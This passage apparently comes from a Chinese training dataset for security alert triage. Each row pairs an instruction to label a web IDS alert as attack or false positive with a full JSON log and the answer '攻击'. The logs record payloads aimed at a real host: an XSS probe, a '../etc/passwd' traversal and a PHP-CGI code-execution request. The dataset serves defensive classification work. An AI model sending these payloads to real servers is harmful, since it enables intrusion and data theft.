1.跨站脚本攻击就是指恶意攻击者向网页中插入一段恶意代码,当用户浏览该网页时,嵌入到网页中的恶意代码就会被执行,一般用来盗取浏览器cookie。 2.跨站脚本攻击漏洞,英文名称CrossSiteScripting,简称CSS又叫XSS。它指的是恶意攻击者向Web页面中插入一段恶意代码,当用户浏览该页面时,嵌入到Web页面中的恶意代码就会被执行,从而达到恶意攻击者的特殊目的。", "dip_addr": "局域网", "dport": "80", "alert_devip": "172.31.191.57", "rsp_status": "0", "update_time": "1732637281", "code_language": "", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "sip": "124.239.114.146", "public_date": "2023-08-02 18:16:19", "dimension": "3", "skyeye_serial_num": "QbJK/8ze/", "src_mac": "00:94:a1:5e:6e:87", "file_name": "", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "site_app": "", "super_attack_chain": "0x02000000", "hit_end": "30", "h_proto_version": "HTTP/1.1", "serial_num": "QbJK/8ze/", "uri": "/?search=<script>alert(1)</script>", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "tcp_option": "", "rule_id": "0x10021722", "req_header": "GET /?search=<script>alert(1)</script> HTTP/1.1\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Encoding: gzip,deflate,br\r\nUser-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)\r\nHost: www.hn.sgcc.cn\r\nConnection: Keep-alive\r\n\r\n", "req_body": "", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "124.239.114.146", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268572450-发现跨站脚本绕过攻击(XSS)", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"os\": \"Windows/XP\", \"software\": \"IE/7.0\", \"hw_type\": \"PC\"}}", "host_md5": "f6db9e52e2bff91b14ad1c771a76818d", "sport": "8213", "h_url": "/?search=<script>alert(1)</script>", "accept-encoding": "gzip,deflate,br", "user-agent": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732637301", "vlan_id": "", "vuln_type": "跨站脚本攻击尝试", "rule_version_str": "3.0.1122.14572", "attack_type": "跨站脚本攻击(XSS)", "dip_group": "未分配资产组", "is_web_attack": "1", "nid": "", "dip": "172.31.193.55", "sip_group": "", "repeat_count": "1", "type": "跨站脚本攻击(XSS)", "skyeye_type": "webids-webattack_dolog", "_origin": {"write_date": 1732637301, "vuln_harm": "Web站点中所包含的脚本直接将用户在HTML页面中的输入(通常是参数值)返回,而不预先加以清理。如果脚本在响应页面中返回由JavaScript代码组成的输入,浏览器便可以执行此输入。因此,有可能形成指向站点的若干链接,且其中一个参数包含恶意的JavaScript代码。该代码将在站点上下文中(由用户浏览器)执行,这使得该代码有权访问用户在该站点中具有访问权的cookie,以及站点中其他可通过用户浏览器访问的窗口。攻击依照下列方式继续进行:攻击者诱惑合法用户单击攻击者生成的链接。用户单击该链接时,便会生成对于Web站点的请求,其中的参数值含有恶意的JavaScript代码。如果Web站点将这个参数值嵌入在响应的HTML页面中(这正是站点问题的本质所在),恶意代码便会在用户浏览器中运行。2.比如有一天你打开一个网站,突然弹出一个窗口提示叫你登录你以为是这个网站让你登录当你输入账户密码以后你的所有操作都被黑客记录了,还有小白问“盗取浏览器cookie有什么用”黑客盗取你的浏览器cookies以后可以利用你的cookie登录你在特定网站或者论坛的账户。3.网站常见的存在跨站的地方多半都在留言本,搜索,评论。这些地方,特别是有留言和评论的地方要注意,你网站这两个地方存在跨站,黑客可以直接在这两个地方提交跨站攻击脚本,你登录后台查看留言和评论以后就被攻击了。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_header", "dip": "172.31.193.55", "site_app": "其他", "hit_end": 26, "uri": "/?search=<script>alert(1)</script>", "dport": 80, "vuln_name": "跨站脚本攻击尝试", "rsp_status": 0, "code_language": "其他", "solution": "请对输入参数进行严格控制。", "hit_start": 6, "detail_info": "跨站脚本攻击就是指恶意攻击者向网页中插入一段恶意代码,当用户浏览该网页时,嵌入到网页中的恶意代码就会被执行。攻击者正在进行跨站脚本攻击。", "xff": "", "sip": "124.239.114.146", "vuln_desc": "跨站脚本攻击就是指恶意攻击者向网页中插入一段恶意代码,当用户浏览该网页时,嵌入到网页中的恶意代码就会被执行。攻击者正在进行跨站脚本攻击。", "public_date": "2018-11-14 00:00:00", "sport": 8213}, "solution": "请对输入参数进行严格控制。", "hit_start": "6", "skyeye_id": "", "payload": {"req_header": "R0VUIC8/c2VhcmNoPTxzY3JpcHQ+YWxlcnQoMSk8L3NjcmlwdD4gSFRUUC8xLjENCkFjY2VwdDogdGV4dC9odG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCxhcHBsaWNhdGlvbi94bWw7cT0wLjksKi8qO3E9MC44DQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsZGVmbGF0ZSxicg0KVXNlci1BZ2VudDogVXNlci1BZ2VudDogTW96aWxsYS80LjAgKGNvbXBhdGlibGU7IE1TSUUgNy4wOyBXaW5kb3dzIE5UIDUuMTsgMzYwU0UpDQpIb3N0OiB3d3cuaG4uc2djYy5jbg0KQ29ubmVjdGlvbjogS2VlcC1hbGl2ZQ0KDQo=", "req_body": "", "rsp_header": "", "rsp_body": ""}, "detail_info": "跨站脚本攻击就是指恶意攻击者向网页中插入一段恶意代码,当用户浏览该网页时,嵌入到网页中的恶意代码就会被执行。攻击者正在进行跨站脚本攻击。", "file_md5": "", "host": "www.hn.sgcc.cn", "host_state": "失败", "rule_key": "webids", "connection": "Keep-alive", "api": "www.hn.sgcc.cn/", "first_access_time": "2024-11-27 00:08:21", "hazard_level": "4", "hazard_rating": "中危", "hit_field": "req_header", "rsp_body": "", "h_method": "GET", "sip_addr": "中国--河北省--衡水市", "x_forwarded_for": "", "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "跨站脚本攻击尝试", "alarm_sip": "172.31.193.55", "rule_desc": "网页漏洞利用", "skyeye_index": "", "sip_ioc_dip": "45bf9a30226f62670a14ceaab7697c09", "proto": "http", "xff": "", "alarm_id": "20241127_0902d9bd2c6168f40346af151097c20e", "vuln_desc": "跨站脚本攻击就是指恶意攻击者向网页中插入一段恶意代码,当用户浏览该网页时,嵌入到网页中的恶意代码就会被执行。攻击者正在进行跨站脚本攻击。", "attack_chain": "0x02010000", "access_time": "2024-11-27 00:08:21", "attack_addr": "中国--河北省--衡水市(37.739933/115.673946)", "type_chain": "16050000", "vuln_harm": "Web站点中所包含的脚本直接将用户在HTML页面中的输入(通常是参数值)返回,而不预先加以清理。如果脚本在响应页面中返回由JavaScript代码组成的输入,浏览器便可以执行此输入。因此,有可能形成指向站点的若干链接,且其中一个参数包含恶意的JavaScript代码。该代码将在站点上下文中(由用户浏览器)执行,这使得该代码有权访问用户在该站点中具有访问权的cookie,以及站点中其他可通过用户浏览器访问的窗口。攻击依照下列方式继续进行:攻击者诱惑合法用户单击攻击者生成的链接。用户单击该链接时,便会生成对于Web站点的请求,其中的参数值含有恶意的JavaScript代码。如果Web站点将这个参数值嵌入在响应的HTML页面中(这正是站点问题的本质所在),恶意代码便会在用户浏览器中运行。2.比如有一天你打开一个网站,突然弹出一个窗口提示叫你登录你以为是这个网站让你登录当你输入账户密码以后你的所有操作都被黑客记录了,还有小白问“盗取浏览器cookie有什么用”黑客盗取你的浏览器cookies以后可以利用你的cookie登录你在特定网站或者论坛的账户。3.网站常见的存在跨站的地方多半都在留言本,搜索,评论。这些地方,特别是有留言和评论的地方要注意,你网站这两个地方存在跨站,黑客可以直接在这两个地方提交跨站攻击脚本,你登录后台查看留言和评论以后就被攻击了。", "dip_addr": "局域网", "dport": "80", "alert_devip": "172.31.191.57", "rsp_status": "0", "update_time": "1732637281", "code_language": "其他", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "sip": "124.239.114.146", "public_date": "2018-11-14 00:00:00", "dimension": "3", "skyeye_serial_num": "QbJK/8ze/", "src_mac": "00:94:a1:5e:6e:87", "file_name": "", "confidence": "中", "rsp_header": "", "super_type": "攻击利用", "site_app": "其他", "super_attack_chain": "0x02000000", "hit_end": "26", "h_proto_version": "HTTP/1.1", "serial_num": "QbJK/8ze/", "uri": "/?search=<script>alert(1)</script>", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "tcp_option": "", "rule_id": "0x10000c01", "req_header": "GET /?search=<script>alert(1)</script> HTTP/1.1\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Encoding: gzip,deflate,br\r\nUser-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)\r\nHost: www.hn.sgcc.cn\r\nConnection: Keep-alive\r\n\r\n", "req_body": "", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "124.239.114.146", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268438529-跨站脚本攻击尝试", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"os\": \"Windows/XP\", \"software\": \"IE/7.0\", \"hw_type\": \"PC\"}}", "host_md5": "f6db9e52e2bff91b14ad1c771a76818d", "sport": "8213", "h_url": "/?search=<script>alert(1)</script>", "accept-encoding": "gzip,deflate,br", "user-agent": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732637300", "vlan_id": "", "vuln_type": "发现尝试请求Linux下敏感文件", "rule_version_str": "3.0.1122.14572", "attack_type": "默认配置不当", "dip_group": "未分配资产组", "is_web_attack": "1", "nid": "", "dip": "172.31.193.55", "sip_group": "", "repeat_count": "1", "type": "配置不当/错误", "skyeye_type": "webids-webattack_dolog", "_origin": {"write_date": 1732637300, "vuln_harm": "此类请求行为一旦成功,攻击者可通过访问敏感信息实施进一步的攻击。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_header", "dip": "172.31.193.55", "site_app": "其他", "hit_end": 299, "uri": "/?page=../../../../../../../../../etc/passwd%00.jpg", "dport": 80, "vuln_name": "发现尝试请求Linux下敏感文件", "rsp_status": 0, "code_language": "其他", "solution": "对此类敏感请求进行拦截。", "hit_start": 279, "detail_info": "发现在HTTP请求中发现试图访问Linux下敏感文件的疑似攻击行为。", "xff": "", "sip": "124.239.114.146", "vuln_desc": "发现在HTTP请求中发现试图访问Linux下敏感文件的疑似攻击行为。", "public_date": "2018-08-30 16:27:11", "sport": 8181}, "solution": "对此类敏感请求进行拦截。", "hit_start": "279", "skyeye_id": "", "payload": {"req_header": "R0VUIC8/cGFnZT0uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi9ldGMvcGFzc3dkJTAwLmpwZyBIVFRQLzEuMQ0KQWNjZXB0OiB0ZXh0L2h0bWwsYXBwbGljYXRpb24veGh0bWwreG1sLGFwcGxpY2F0aW9uL3htbDtxPTAuOSwqLyo7cT0wLjgNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCxkZWZsYXRlLGJyDQpVc2VyLUFnZW50OiBVc2VyLUFnZW50OiBNb3ppbGxhLzQuMCAoY29tcGF0aWJsZTsgTVNJRSA3LjA7IFdpbmRvd3MgTlQgNS4xOyAzNjBTRSkNCkhvc3Q6IHd3dy5obi5zZ2NjLmNuDQpDb25uZWN0aW9uOiBLZWVwLWFsaXZlDQoNCg==", "req_body": "", "rsp_header": "", "rsp_body": ""}, "detail_info": "发现在HTTP请求中发现试图访问Linux下敏感文件的疑似攻击行为。", "file_md5": "", "host": "www.hn.sgcc.cn", "host_state": "失败", "rule_key": "webids", "connection": "Keep-alive", "api": "www.hn.sgcc.cn/", "first_access_time": "2024-11-27 00:08:20", "hazard_level": "6", "hazard_rating": "高危", "hit_field": "req_header", "rsp_body": "", "h_method": "GET", "sip_addr": "中国--河北省--衡水市", "x_forwarded_for": "", "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "发现尝试请求Linux下敏感文件", "alarm_sip": "172.31.193.55", "rule_desc": "网页漏洞利用", "skyeye_index": "", "sip_ioc_dip": "51440f84d9467a5717f8514a0bc1e00e", "proto": "http", "xff": "", "alarm_id": "20241127_946fdfc95ac6e266c4b6646d9492b7ab", "vuln_desc": "发现在HTTP请求中发现试图访问Linux下敏感文件的疑似攻击行为。", "page": "../../../../../../../../../etc/passwd\u0000.jpg", "attack_chain": "0x01020000", "access_time": "2024-11-27 00:08:20", "attack_addr": "中国--河北省--衡水市(37.739933/115.673946)", "type_chain": "160C0000", "vuln_harm": "此类请求行为一旦成功,攻击者可通过访问敏感信息实施进一步的攻击。", "dip_addr": "局域网", "dport": "80", "alert_devip": "172.31.191.57", "rsp_status": "0", "update_time": "1732637279", "code_language": "其他", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "sip": "124.239.114.146", "public_date": "2018-08-30 16:27:11", "dimension": "3", "skyeye_serial_num": "QbJK/8ze/", "url_path": "/", "src_mac": "00:94:a1:5e:6e:87", "file_name": "", "confidence": "中", "rsp_header": "", "super_type": "攻击利用", "site_app": "其他", "super_attack_chain": "0x01000000", "hit_end": "299", "h_proto_version": "HTTP/1.1", "serial_num": "QbJK/8ze/", "uri": "/?page=../../../../../../../../../etc/passwd%00.jpg", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "tcp_option": "", "rule_id": "0x10020571", "req_header": "GET /?page=../../../../../../../../../etc/passwd%00.jpg HTTP/1.1\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Encoding: gzip,deflate,br\r\nUser-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)\r\nHost: www.hn.sgcc.cn\r\nConnection: Keep-alive\r\n\r\n", "req_body": "", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "124.239.114.146", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268567921-发现尝试请求Linux下敏感文件", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"os\": \"Windows/XP\", \"software\": \"IE/7.0\", \"hw_type\": \"PC\"}}", "host_md5": "f6db9e52e2bff91b14ad1c771a76818d", "sport": "8181", "h_url": "/?page=../../../../../../../../../etc/passwd%00.jpg", "accept-encoding": "gzip,deflate,br", "user-agent": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732637300", "vlan_id": "", "vuln_type": "发现目录穿越攻击行为", "rule_version_str": "3.0.1122.14572", "attack_type": "目录遍历", "dip_group": "未分配资产组", "is_web_attack": "1", "nid": "", "dip": "172.31.193.55", "sip_group": "", "repeat_count": "1", "type": "目录遍历", "skyeye_type": "webids-webattack_dolog", "_origin": {"write_date": 1732637300, "vuln_harm": "1.程序在实现上没有充分过滤用户输入的../之类的目录跳转符,导致恶意用户可以通过提交目录跳转来遍历服务器上的任意文件。\r\n2.目录遍历攻击可使攻击者越权直接查看整个网站的目录结构及文件,并且可能利用此类型攻击跨目录上传下载服务器中敏感文件。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_header", "dip": "172.31.193.55", "site_app": "通用", "hit_end": 299, "uri": "/?page=../../../../../../../../../etc/passwd%00.jpg", "dport": 80, "vuln_name": "发现目录穿越攻击行为", "rsp_status": 0, "code_language": "通用", "solution": "1.对用户的输入进行验证,特别是路径替代目录跳转符\r\n2.尽可能采用白名单的形式,验证所有输入\r\n3.合理配置web服务器的目录权限", "hit_start": 279, "detail_info": "目录遍历(路径遍历)是由于web服务器或者web应用程序对用户输入的文件名称的安全性验证不足而导致的一种安全漏洞,使得攻击者通过利用一些特殊字符就可以绕过服务器的安全限制,访问任意的文件(可以使web根目录以外的文件),甚至执行系统命令", "xff": "", "sip": "124.239.114.146", "vuln_desc": "目录遍历(路径遍历)是由于web服务器或者web应用程序对用户输入的文件名称的安全性验证不足而导致的一种安全漏洞,使得攻击者通过利用一些特殊字符就可以绕过服务器的安全限制,访问任意的文件(可以使web根目录以外的文件),甚至执行系统命令", "public_date": "2018-08-16 18:57:22", "sport": 8181}, "solution": "1.对用户的输入进行验证,特别是路径替代目录跳转符\r\n2.尽可能采用白名单的形式,验证所有输入\r\n3.合理配置web服务器的目录权限", "hit_start": "279", "skyeye_id": "", "payload": {"req_header": "R0VUIC8/cGFnZT0uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi9ldGMvcGFzc3dkJTAwLmpwZyBIVFRQLzEuMQ0KQWNjZXB0OiB0ZXh0L2h0bWwsYXBwbGljYXRpb24veGh0bWwreG1sLGFwcGxpY2F0aW9uL3htbDtxPTAuOSwqLyo7cT0wLjgNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCxkZWZsYXRlLGJyDQpVc2VyLUFnZW50OiBVc2VyLUFnZW50OiBNb3ppbGxhLzQuMCAoY29tcGF0aWJsZTsgTVNJRSA3LjA7IFdpbmRvd3MgTlQgNS4xOyAzNjBTRSkNCkhvc3Q6IHd3dy5obi5zZ2NjLmNuDQpDb25uZWN0aW9uOiBLZWVwLWFsaXZlDQoNCg==", "req_body": "", "rsp_header": "", "rsp_body": ""}, "detail_info": "目录遍历(路径遍历)是由于web服务器或者web应用程序对用户输入的文件名称的安全性验证不足而导致的一种安全漏洞,使得攻击者通过利用一些特殊字符就可以绕过服务器的安全限制,访问任意的文件(可以使web根目录以外的文件),甚至执行系统命令", "file_md5": "", "host": "www.hn.sgcc.cn", "host_state": "失败", "rule_key": "webids", "connection": "Keep-alive", "api": "www.hn.sgcc.cn/", "first_access_time": "2024-11-27 00:08:20", "hazard_level": "6", "hazard_rating": "高危", "hit_field": "req_header", "rsp_body": "", "h_method": "GET", "sip_addr": "中国--河北省--衡水市", "x_forwarded_for": "", "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "发现目录穿越攻击行为", "alarm_sip": "172.31.193.55", "rule_desc": "网页漏洞利用", "skyeye_index": "", "sip_ioc_dip": "33bc11c95ce88c2d0efbcc6610323056", "proto": "http", "xff": "", "alarm_id": "20241127_295c3bb524ec2563e7c38fc3a715992f", "vuln_desc": "目录遍历(路径遍历)是由于web服务器或者web应用程序对用户输入的文件名称的安全性验证不足而导致的一种安全漏洞,使得攻击者通过利用一些特殊字符就可以绕过服务器的安全限制,访问任意的文件(可以使web根目录以外的文件),甚至执行系统命令", "page": "../../../../../../../../../etc/passwd\u0000.jpg", "attack_chain": "0x02010000", "access_time": "2024-11-27 00:08:20", "attack_addr": "中国--河北省--衡水市(37.739933/115.673946)", "type_chain": "160B0000", "vuln_harm": "1.程序在实现上没有充分过滤用户输入的../之类的目录跳转符,导致恶意用户可以通过提交目录跳转来遍历服务器上的任意文件。\r\n2.目录遍历攻击可使攻击者越权直接查看整个网站的目录结构及文件,并且可能利用此类型攻击跨目录上传下载服务器中敏感文件。", "dip_addr": "局域网", "dport": "80", "alert_devip": "172.31.191.57", "rsp_status": "0", "update_time": "1732637279", "code_language": "通用", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "sip": "124.239.114.146", "public_date": "2018-08-16 18:57:22", "dimension": "3", "skyeye_serial_num": "QbJK/8ze/", "url_path": "/", "src_mac": "00:94:a1:5e:6e:87", "file_name": "", "confidence": "中", "rsp_header": "", "super_type": "攻击利用", "site_app": "通用", "super_attack_chain": "0x02000000", "hit_end": "299", "h_proto_version": "HTTP/1.1", "serial_num": "QbJK/8ze/", "uri": "/?page=../../../../../../../../../etc/passwd%00.jpg", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "tcp_option": "", "rule_id": "0x1002055d", "req_header": "GET /?page=../../../../../../../../../etc/passwd%00.jpg HTTP/1.1\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Encoding: gzip,deflate,br\r\nUser-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)\r\nHost: www.hn.sgcc.cn\r\nConnection: Keep-alive\r\n\r\n", "req_body": "", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "124.239.114.146", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268567901-发现目录穿越攻击行为", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"os\": \"Windows/XP\", \"software\": \"IE/7.0\", \"hw_type\": \"PC\"}}", "host_md5": "f6db9e52e2bff91b14ad1c771a76818d", "sport": "8181", "h_url": "/?page=../../../../../../../../../etc/passwd%00.jpg", "accept-encoding": "gzip,deflate,br", "user-agent": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732637286", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "信息泄露", "_origin": {"write_date": 1732637286, "vuln_harm": "远程攻击者可利用该漏洞在服务器进程上下文中查看文件的源代码,获取敏感信息,在受影响计算机上运行任意PHP代码,也可能执行其他攻击。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_header", "dip": "172.31.193.55", "site_app": "其他", "hit_end": 47, "uri": "/cgi-bin/php.cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E", "dport": 80, "vuln_name": "PHP CGI查询参数信息泄漏漏洞", "rsp_status": 0, "code_language": "其他", "solution": "目前厂商已经发布了升级补丁以修复此安全问题,补丁获取链接:\r\n<a href=\"http://www.php.net/archive/2012.php#id2012-05-08-1\" target=\"_blank\" rel=\"nofollow\">http://www.php.net/archive/2012.php#id2012-05-08-1</a>", "hit_start": 27, "detail_info": "PHP是一款免费开放源代码的WEB脚本语言包,可使用在Microsoft Windows、Linux和Unix操作系统下。<br/>PHP中存在信息泄漏漏洞。", "xff": "", "sip": "124.239.114.146", "vuln_desc": "PHP是一款免费开放源代码的WEB脚本语言包,可使用在Microsoft Windows、Linux和Unix操作系统下。<br/>PHP中存在信息泄漏漏洞。", "public_date": "2018-11-14 00:00:00", "sport": 7999}, "detail_info": "PHP是一款免费开放源代码的WEB脚本语言包,可使用在Microsoft Windows、Linux和Unix操作系统下。<br/>PHP中存在信息泄漏漏洞。", "file_md5": "26bdeba127ea52f040c116037c5823a6", "rule_key": "webids", "connection": "Keep-alive", "api": "www.hn.sgcc.cn/cgi-bin/php.cgi", "first_access_time": "2024-11-27 00:08:06", "hazard_level": "4", "hazard_rating": "中危", "hit_field": "req_header", "h_method": "POST", "sip_addr": "中国--河北省--衡水市", "x_forwarded_for": "", "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "PHP CGI查询参数信息泄漏漏洞", "alarm_sip": "172.31.193.55", "skyeye_index": "", "sip_ioc_dip": "20b63ab6d8069a480db22b24d32fe954", "xff": "", "vuln_desc": "PHP是一款免费开放源代码的WEB脚本语言包,可使用在Microsoft Windows、Linux和Unix操作系统下。<br/>PHP中存在信息泄漏漏洞。", "attack_chain": "0x02030000", "vuln_harm": "远程攻击者可利用该漏洞在服务器进程上下文中查看文件的源代码,获取敏感信息,在受影响计算机上运行任意PHP代码,也可能执行其他攻击。", "dport": "80", "alert_devip": "172.31.191.57", "update_time": "1732637267", "code_language": "其他", "public_date": "2018-11-14 00:00:00", "skyeye_serial_num": "QbJK/8ze/", "site_app": "其他", "super_attack_chain": "0x02000000", "hit_end": "47", "h_proto_version": "HTTP/1.1", "uri": "/cgi-bin/php.cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x10000bfa", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "124.239.114.146", "host_md5": "f6db9e52e2bff91b14ad1c771a76818d", "accept-encoding": "gzip,deflate,br", "user-agent": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)", "vlan_id": "", "vuln_type": "PHP CGI查询参数信息泄漏漏洞", "attack_type": "信息泄露", "is_web_attack": "1", "dip": "172.31.193.55", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "目前厂商已经发布了升级补丁以修复此安全问题,补丁获取链接:\r\n<a href=\"http://www.php.net/archive/2012.php#id2012-05-08-1\" target=\"_blank\" rel=\"nofollow\">http://www.php.net/archive/2012.php#id2012-05-08-1</a>", "hit_start": "27", "skyeye_id": "", "payload": {"req_header": "UE9TVCAvY2dpLWJpbi9waHAuY2dpPyUyRCU2NCslNjElNkMlNkMlNkYlNzclNUYlNzUlNzIlNkMlNUYlNjklNkUlNjMlNkMlNzUlNjQlNjUlM0QlNkYlNkUrJTJEJTY0KyU3MyU2MSU2NiU2NSU1RiU2RCU2RiU2NCU2NSUzRCU2RiU2NiU2NislMkQlNjQrJTczJTc1JTY4JTZGJTczJTY5JTZFJTJFJTczJTY5JTZEJTc1JTZDJTYxJTc0JTY5JTZGJTZFJTNEJTZGJTZFKyUyRCU2NCslNjQlNjklNzMlNjElNjIlNkMlNjUlNUYlNjYlNzUlNkUlNjMlNzQlNjklNkYlNkUlNzMlM0QlMjIlMjIrJTJEJTY0KyU2RiU3MCU2NSU2RSU1RiU2MiU2MSU3MyU2NSU2NCU2OSU3MiUzRCU2RSU2RiU2RSU2NSslMkQlNjQrJTYxJTc1JTc0JTZGJTVGJTcwJTcyJTY1JTcwJTY1JTZFJTY0JTVGJTY2JTY5JTZDJTY1JTNEJTcwJTY4JTcwJTNBJTJGJTJGJTY5JTZFJTcwJTc1JTc0KyUyRCU2NCslNjMlNjclNjklMkUlNjYlNkYlNzIlNjMlNjUlNUYlNzIlNjUlNjQlNjklNzIlNjUlNjMlNzQlM0QlMzArJTJEJTY0KyU2MyU2NyU2OSUyRSU3MiU2NSU2NCU2OSU3MiU2NSU2MyU3NCU1RiU3MyU3NCU2MSU3NCU3NSU3MyU1RiU2NSU2RSU3NiUzRCUzMCslMkQlNkUgSFRUUC8xLjENCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkDQpBY2NlcHQ6IHRleHQvaHRtbCxhcHBsaWNhdGlvbi94aHRtbCt4bWwsYXBwbGljYXRpb24veG1sO3E9MC45LCovKjtxPTAuOA0KQWNjZXB0LUVuY29kaW5nOiBnemlwLGRlZmxhdGUsYnINCkNvbnRlbnQtTGVuZ3RoOiA0Mw0KVXNlci1BZ2VudDogVXNlci1BZ2VudDogTW96aWxsYS80LjAgKGNvbXBhdGlibGU7IE1TSUUgN